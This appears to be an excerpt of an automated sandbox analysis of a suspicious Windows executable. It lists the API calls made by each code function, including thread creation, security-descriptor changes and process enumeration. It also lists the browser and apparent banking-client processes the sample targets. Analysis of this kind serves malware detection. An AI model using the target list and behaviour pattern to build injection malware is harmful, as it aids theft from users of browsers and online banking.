Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe22_2_012F1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe25_2_015A1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_01593610
